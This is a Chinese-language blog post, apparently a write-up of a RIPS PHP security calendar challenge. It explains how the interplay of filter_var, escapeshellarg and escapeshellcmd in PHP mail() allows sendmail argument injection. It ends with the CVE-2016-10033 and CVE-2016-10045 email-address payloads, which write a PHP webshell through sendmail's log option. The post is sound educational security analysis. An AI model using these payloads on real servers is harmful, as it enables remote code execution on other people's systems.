PHP mail()可能导致的问题

参考文献:https://xz.aliyun.com/t/2501
题目网址:https://www.ripstech.com/php-security-calendar-2017/

环境:

php version < 5.2.0
phpmailer < 5.2.18
php 没有安装 pcre(no default)
safe_mode = false(default)

题目
class Mailer {
    private function sanitize($email) {
        if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
            return '';
        }
        return escapeshellarg($email);
    }
    public function send($data) {
        if (!isset($data['to'])) {
            $data['to'] = 'none@ripstech.com';
        } else {
            $data['to'] = $this->sanitize($data['to']);
        }
        if (!isset($data['from'])) {
            $data['from'] = 'none@ripstech.com';
        } else {
            $data['from'] = $this->sanitize($data['from']);
        }
        if (!isset($data['subject'])) {
            $data['subject'] = 'No Subject';
        }
        if (!isset($data['message'])) {
            $data['message'] = '';
        }
        mail($data['to'], $data['subject'], $data['message'],
             '', "-f" . $data['from']);
    }
}
$mailer = new Mailer();
$mailer->send($_POST);
①mail()函数

整体来看此题目是发送邮件的,先看下mail()函数的用法

mail(to,subject,message,headers,parameters)
to             必需。规定邮件的接收者。
subject        必需。规定邮件的主题。该参数不能包含任何换行字符。
message        必需。规定要发送的消息。
headers        必需。规定额外的报头,比如 From, Cc 以及 Bcc。
parameters     必需。规定 sendmail 程序的额外参数。
②filter_var()函数

filter_var($email, FILTER_VALIDATE_EMAIL)//邮件过滤器,确保在第5个参数中仅使用有效的电子邮件地址mail()

filter_var(variable, filter, options)函数通过指定的过滤器过滤变量。如果成功,则返回已过滤的数据,如果失败,则返回 false
variable    必需。规定要过滤的变量。
filter  可选。规定要使用的过滤器的 ID。
options     规定包含标志/选项的数组。检查每个过滤器可能的标志和选项。

此函数在双引号中嵌套转义空格仍然能够通过检测。同时由于底层正则表达式的原因,通过重叠单引号和双引号,欺骗 filter_var(),这样就可以绕过检测。
一个简单的例子:

<?php
var_dump(filter_var('\'is."\'\ not\ allowed"@123.com',FILTER_VALIDATE_EMAIL));
var_dump(filter_var('"is.\ not\ allowed"@123.com',FILTER_VALIDATE_EMAIL));
var_dump(filter_var('"is.""\ not\ allowed"@123.com',FILTER_VALIDATE_EMAIL));
?>
img_ee1879a78a9b30560a139e477072daa6.png
1.png
③escapeshellcmd()函数

引入的特殊符号,虽然绕过了filter_var()的检测,但PHP的mail()在底层调用了 escapeshellcmd() ,对用户输入的邮箱地址进行检测,即使存在特殊符号,也会被 escapeshellcmd()处理转义,这样就没办法达到命令执行的目的了。

但还调用了escapeshellarg()//把字符串转码为可以在 shell 命令里使用的参数,此函数将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,确保能够直接将一个字符串传入 shell 函数(含 exec(),system(),反引号)
一个例子

<?php
$a="127.0.0.1' -v -d a=1";
$b=escapeshellarg($a);
$c=escapeshellcmd($b);
$cmd="curl ".$c;
var_dump($b)."\n";
var_dump($c)."\n";
var_dump($cmd)."\n";
system($cmd);
?>
  • 传入的参数是127.0.0.1' -v -d a=1
  • escapeshellarg()先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。处理之后为:'127.0.0.1'\'' -v -d a=1'
  • 接着escapeshellcmd()对第二步处理后字符串中的 \以及 a=1'中的单引号进行转义处理,结果为:'127.0.0.1'\\'' -v -d a=1\'
  • 第三步处理之后的payload中的\\被解释成了\而不再是转义字符,所以单引号配对连接之后将payload分割为三个部分:
    '127.0.0.1'\
    \'' -v -d
    a=1\'
  • 所以这个payload可以简化为curl 127.0.0.1\ -v -d a=1',即向 127.0.0.1\发起请求,POST 数据为 a=1'
根据此漏洞有两个实例:

CVE-2016-10033
payload:
a( -OQueueDirectory=/tmp -X/var/www/html/x.php )@a.com
然后通过 linux 自身的 sendmail 写log的方式,把log写到web根目录下。将日志文件后缀定义为 .php ,即可成功写入webshell。

CVE-2016-10045
payload:

a'( -OQueueDirectory=/tmp -X/var/www/html/x.php )@a.com
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值